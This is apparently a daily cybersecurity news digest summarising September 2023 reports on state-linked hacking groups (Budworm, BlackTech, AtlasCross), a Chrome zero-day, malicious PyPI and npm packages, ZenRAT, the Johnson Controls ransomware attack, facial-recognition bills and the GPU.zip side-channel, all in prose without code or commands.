Daily Brief

A Chinese hacker group known as Budworm has been found to be targeting a telecommunications firm in the Middle East and a government entity in Asia with its custom malware, SysUpdate. SysUpdate is a remote access trojan that performs various functions such as process management, data retrieval, screenshot capturing, and command execution. The newest variant of the backdoor was detected in August 2023, and is launched via DLL sideloading, thereby evading detection by security tools on the target host. The attackers also use several publicly available tools for credential dumping, network mapping, and data theft. This incident falls within a recurrent trend of telecom companies being targeted by state-sponsored and APT hacking groups. The Budworm hacking group has been active since 2013, engaging in various cybercrimes targeting sectors such as government, technology, and defense. Previous attacks by Budworm include supply chain attacks in Germany, targeting several online gaming and gambling companies, and multiple ministries in Belgium.

Taiwanese group BlackTech, linked to the Chinese government, has reportedly exploited routers to launch attacks on US and Japanese companies. The group manipulates router firmware, allowing it to access corporate networks through international subsidiaries, primarily focusing on targets in Japan and the United States. BlackTech has been identified by various entities including the National Security Agency (NSA), Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Japan National Police Agency (NPA), and the Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC), among others. The sectors targeted include government and military departments, as well as industries such as technology, media, electronics, telecommunications and more in the US and Japan. Since 2007, BlackTech has performed covert operations against targets in East Asia and shows capabilities of operating undetected. The group uses backdoors for a range of attacks and is known for exploiting vulnerable routers for use as command-and-control (C&C) servers. BlackTech's typical attack mode involves spear-phishing emails with malicious attachments that deploy malware designed to extract sensitive data. The group also uses advanced evasion techniques, such as leveraging stolen code-signing certificates and other living-off-the-land (LotL) techniques, for long-term stealth operations. To counter these threats, companies are advised to monitor network devices for unauthorized downloads of bootloaders and firmware images, as well as detect and investigate anomalous traffic to routers.

Google's chatbot, Bard, which was given the capability to share conversations with unique public links in July, has had these links indexed by Google Search, making them readily discoverable. While Google suggests these public links can be removed, they persist in its own search service, even as the shared links are designed to automatically expire in six months. Although these chat records do not contain personal information, users may not be aware that their shared links can feature in Google Search results. This new concern with Bard adds to Google's series of previous privacy issues, including settlements linked to biometrics, location data, and tracking claims. Google acknowledged that its search service may be capturing too much data and is reportedly working on a solution to prevent the indexing of shared Bard chats.

The Budworm threat actor group, linked with China, has launched new attacks on a Middle Eastern telecom company and an Asian government using its updated SysUpdate malware. The group is also known as APT27, Bronze Union, Emissary Panda, Iron Tiger, Lucky Mouse, and Red Phoenix, and has been active since 2013. It aims to gather intelligence from various industries. Budworm uses a variety of malware, including China Chopper web shell, Gh0st RAT, HyperBro, PlugX, SysUpdate, and ZXShell for its operations. It has been known to exploit vulnerable internet-facing services to access targeted networks. The Linux version of SysUpdate was detailed by Trend Micro, describing its ability to bypass security measures and resist reverse engineering. Its features include screenshots capture, arbitrary process termination, file operations, drive information retrieval, and command execution. Although the malware is feature-rich, Symantec says that the group's activity was potentially stopped early in the attack chain since they only observed credential harvesting in infected machines. Symantec also noted that Budworm continuously develops SysUpdate to enhance its capacities and evade detection. They use a unique methodology, including DLL side-loading using previously utilized applications. This highlights the group's confidence in using the known malware despite potential detection and attribution risks.

Traditional browser isolation, once considered an excellent method to ward off malware and browser exploits, is no longer seen as secure enough, especially in a software as a service (SaaS) dominated ecosystem. The approach's weaknesses include its impact on browser performance and inability to fend off newer web threats like phishing and harmful extensions. Historically, browser isolation allowed unknown code to execute in a separate environment, not directly on the endpoint, protecting devices and users against potentially malicious code. The shift to a more browser and SaaS-dependent workspace has amplified the negative impact of traditional browser isolation on the performance of web tools and services. Evolving web threats and their changing nature have outpaced browser isolation techniques, causing a security gap. The next generation of browser security is turning towards secure browser extensions, which can integrate seamlessly into existing browsers, monitor and analyse web page components, and effectively neutralize threats with minimal impact on performance.

Minister for National Security of China, Chen Yixin, has identified network security incidents, including the spread of fake news and cyberattacks, as the most significant digital threats to China. In an article for China Cyberspace, the official magazine of the Cyberspace Administration of China, Chen also blamed international competition in cyberspace as a key competitive challenge for China. Chen took issue with foreign technology alliances allegedly aimed at excluding China, accusing them of being motivated by intentions to monopolize technology leadership rather than genuine security concerns. Chen noted China's technological weakness lies in the control exerted by other nations over core technologies and stated that China cannot yet match the quality of offshore tech providers. Cyberattacks on Chinese infrastructure and theft of data from government and scientific research institutions were cited as additional threats to the nation's security. Moving forward, Chen advocated following party lines, making progress in sectors such as quantum computing, and improving IT governance and security to confront these challenges. These comments coincide with China's continued emphasis on boosting its digital capabilities and improving controls over online activities.

Google has rolled out fixes to address a high-severity, actively exploited zero-day vulnerability (CVE-2023-5217) in the Chrome browser. The vulnerability could result in program crashes or arbitrary code execution. The flaw, discovered by Clément Lecigne of Google's Threat Analysis Group, resides in libvpx, a free software video codec library, and involves a heap-based buffer overflow in the VP8 compression format. The bug reportedly has been exploited by a commercial spyware vendor targeting high-risk individuals. The discovery brings the total of patched zero-day vulnerabilities in Google Chrome this year to five. Google issued a new CVE identifier (CVE-2023-5129) for a critical flaw in the libwebp image library, which is under active cyber attacks in the wild. Users of Chrome and Chromium-based browsers, including Microsoft Edge, Brave, Opera, and Vivaldi, are advised to upgrade to the latest browser versions to mitigate potential threats.

Google has addressed its fifth Chrome zero-day vulnerability, CVE-2023-5217, which has been actively exploited in attacks since the beginning of the year. The fix is currently rolling out to users globally. The high risk vulnerability is caused by a heap buffer overflow weakness in the VP8 encoding of the open-source libvpx video codec library, potentially leading to app crashes or arbitrary code execution. Google's Threat Analysis Group (TAG) reported the bug. TAG researchers often uncover and report zero-day exploits commonly used in targeted spyware attacks perpetrated by state-sponsored threat groups. While Google confirmed that the CVE-2023-5217 exploit had been used in attacks, further information regarding these incidents has not been disclosed. By restricting access to bug details and maintaining restrictions on bugs that exist in third party libraries that other projects rely on but have not yet fixed, Google ensures its users have ample time to update their browsers, defending against potential attacks. Due to Google's commitment to proactively addressing these security vulnerabilities, the risk of threat actors creating custom exploits and deploying them in real-world scenarios is diminished.

Malicious PyPI and npm packages have been discovered systematically stealing software developers' sensitive data since September 12, 2023. The cybersecurity firm Sonatype initially identified the attacks with 14 malicious packages on npm. Cybersecurity company Phylum later reported the campaign had expanded to the PyPI ecosystem. To date, attackers have launched roughly seven attack waves and uploaded 45 malicious packages on npm and PyPI; the latter are undergoing rapid variations for better stealth and specific targeting. Middle and later stages of the attack implemented more complex data collection mechanisms, such as retrieving and executing data-collecting bash script from an external domain, and using base64 encoding, later double base64 encoding, to evade analysis. Stolen data includes items like hostname, username, current path, OS version, external and internal IP addresses, and Python version for PyPI packages, as well as information stored in Kubernetes configurations, and SSH private keys. The stolen data could expose developer identities, grant attackers unauthorized system access, or enable modifications to deployments, addition of malicious containers, and potential launching of ransomware attacks. Users of code distribution platforms PyPI and npm are urged to exercise caution when downloading and launching packages due to the constant influx of malware.

Cybercriminals are leveraging fake Bitwarden websites to distribute a new type of password-stealing malware known as ZenRAT. Users are tricked into downloading counterfeit versions of the Bitwarden open-source password manager, which distribute the malware. ZenRAT focuses on extracting browser data, login details, and information about infected hosts by mimicking their system fingerprint, making it appear as if the legitimate user is logging in. The malware appears to be aimed specifically at Windows users and redirects users of other operating systems to an osusource.com article about the password manager. Security firm Proofpoint discovered ZenRat after receiving a malware sample from Jérôme Segura, senior director of threat intelligence at Malwarebytes. Once active, ZenRAT collects data about the host system to create a detailed profile, before communicating these details and other stolen data to the control server. Even though ZenRAT primarily functions as an information stealer, Proofpoint suggests it is potentially designed to be modular with the possibility of expanded capabilities. No additional modules have yet been found in the wild.

Multinational conglomerate Johnson Controls, a provider of industrial control systems, security equipment, air conditioners, and fire safety equipment, was victim to a major ransomware attack, resulting in encrypted company devices and impacted operations. The initial breach occurred in the company's Asia offices and expanded over the weekend, causing an IT system shutdown and website outages; subsidiaries York, Simplex, and Ruskin started displaying technical outage warnings. The attack has been linked to the Dark Angels ransomware gang, who reportedly used a Dark Angels VMware ESXi encryptor with a ransom note demanding $51 million for a data decryptor and to erase stolen data. The cybercriminals claim to have exfiltrated over 27 TB of corporate data and encrypted Johnson Control's VMWare ESXi virtual machines during the attack. Dark Angels, which began its operations in May 2022, breaches networks and steals data for double-extortion attacks, deploying ransomware once they have control of a Windows domain controller. Dark Angels runs a data leak site called 'Dunghill Leaks' used for extortion, where it threatens to leak stolen data if the ransom is not paid; nine victims are currently listed, including Sabre and Sysco which have recently reported cyberattacks.

More than 30 civil and digital rights organizations have expressed their support for two pending New York state bills – 1014-2023 and 1024-2023 – aimed at banning facial recognition and other biometric tech in public spaces and residential buildings. Groups supporting the legislation include the New York Civil Liberties Union, the Surveillance Technology Oversight Project, and Amnesty International. They have criticized such technology for being biased, error-prone, and detrimental to marginalized communities. Bill 1014-2023 seeks to prohibit public places and providers from using biometric recognition to verify or identify customers and bars businesses from refusing entry based on facial recognition tech (FRT). It also prevents companies from selling customers' biometric data. Bill 1024-2023 focuses on the use of facial recognition and other biometric surveillance in residential settings. Concerns have been raised about landlords using the tech to monitor residents and potentially evict them if the system perceives they were not at home often enough. Advocates cite the incident of lawyer Kelly Conlon, who was turned away by a facial recognition system at Radio City Music Hall. Critics of facial recognition say the technology is often inaccurate, with particular biases against women and people of color. Elsewhere, Clearview AI was forced to stop selling facial recognition databases to most U.S. businesses after a lawsuit settlement with the ACLU, while the company was also fined in the U.K. for data scraping. The European Union adopted a draft of the upcoming AI Act, which includes a complete ban on AI's use for biometric surveillance, emotion recognition, and predictive policing.

The US and Japanese cybersecurity agencies have issued a warning regarding the Chinese 'BlackTech' hackers group and their activities. They are known to breach network devices to install backdoors for accessing corporate networks. BlackTech, also known as Palmerworm, Circuit Panda, and Radio Panda, is a Chinese state-sponsored advanced persistent threat group. It has been conducting cyber-espionage attacks on Japanese, Taiwanese, and Hong Kong entities since at least 2010. The sectors targeted by BlackTech primarily include government agencies, industrial organizations, technology companies, media, electronics, telecommunications, and the defense industry. These hackers use custom-made malware to backdoor network devices and steal data by redirecting traffic to servers under their control. They are known to leverage stolen admin credentials to compromise a range of router brands and models and establish persistence. The compromised devices, including Cisco routers, are then used for proxying traffic, blending in with corporate network traffic, and targeting other victims on the same network. BlackTech hackers also modify firmware to hide their activity on the edge devices and to maintain persistence. To hide configuration changes and the history of executed commands, they even deactivate logging on a compromised device while carrying out malicious operations. System administrators have been advised to monitor for unauthorized downloads of firmware images and unusual device reboots, and to treat SSH traffic on the router with high suspicion. Network admins are also encouraged to install all available security patches on edge devices as they become available and to avoid publicly exposing management consoles.

A new threat actor known as AtlasCross has been discovered using Red Cross-themed phishing lures to deliver two previously unknown backdoors, DangerAds and AtlasAgent. The attack begins with a macro-filled Microsoft document about a fictional blood donation drive from the American Red Cross. When opened, the malicious macro sets up persistence and exfiltrates system metadata to a remote server. Part of the attack also downloads a file (DangerAds), which acts as a loader to launch shellcode leading to the deployment of AtlasAgent, a malware capable of collecting system information, operating shellcode, and executing commands. Both AtlasAgent and DangerAds have evasive features built-in to avoid detection by security tools. AtlasCross is also suspected of exploiting known security vulnerabilities to gain control of public network hosts and convert them into command-and-control (C2) servers. Though AtlasCross currently operates with a limited scope of activity, their attack methods are robust and sophisticated, indicating the possibility of more extensive and damaging attacks in the future.

Researchers from four American universities have discovered a novel side-channel attack, termed 'GPU.zip', that leverages data compression to extract sensitive visual data from modern graphics cards while browsing websites. The method was tested using the Chrome browser and involved cross-origin Scalable Vector Graphics (SVG) filter pixel-stealing attacks. Graphic Processor Unit (GPU) vendors including AMD, Apple, NVIDIA, and Qualcomm were alerted to the vulnerability in March 2023; however, no patches have been issued as of September 2023. All modern GPUs, especially integrated Intel and AMD chips, perform software-visible data compression even when not explicitly instructed, which has been exploited by the researchers for the GPU.zip attack. According to the researchers, the GPU.zip attack can steal usernames from a Wikipedia iframe in less than 215 minutes on Intel GPUs with an accuracy of 98.3%. The lack of response from impacted vendors and the ubiquity of the vulnerable graphics cards imply a high potential risk, but the complexity and time requirement for the attack moderate the immediate threat to users. The researchers also note that the attack will not work on browsers like Firefox and Safari that do not meet the specific criteria for exploitation.